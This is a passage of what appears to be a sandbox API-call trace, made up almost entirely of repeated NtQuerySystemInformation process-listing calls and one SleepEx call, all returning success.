Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeee8) returned 0x0 [0202.411] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0204.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0204.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0204.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0204.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0204.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0204.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0204.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0204.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0204.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0204.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0204.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0204.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0204.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xebd0) returned 0x0 [0205.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, 